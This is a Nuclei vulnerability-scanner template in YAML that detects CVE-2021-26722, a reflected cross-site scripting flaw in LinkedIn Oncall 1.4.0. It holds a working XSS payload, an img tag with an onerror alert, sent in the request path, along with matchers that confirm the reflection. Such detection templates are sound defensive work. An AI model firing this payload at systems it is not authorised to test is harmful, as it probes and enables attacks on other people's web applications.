nuclei-templates/cves/2021/CVE-2021-26722.yaml

30 lines
654 B
YAML

id: CVE-2021-26722
info:
name: LinkedIn Oncall 1.4.0 XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26722
tags: cve,cve2021,linkedin,xss
issues: https://github.com/linkedin/oncall/issues/341
requests:
- method: GET
path:
- "{{BaseURL}}/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
part: body
- type: word
words:
- "text/html"
part: header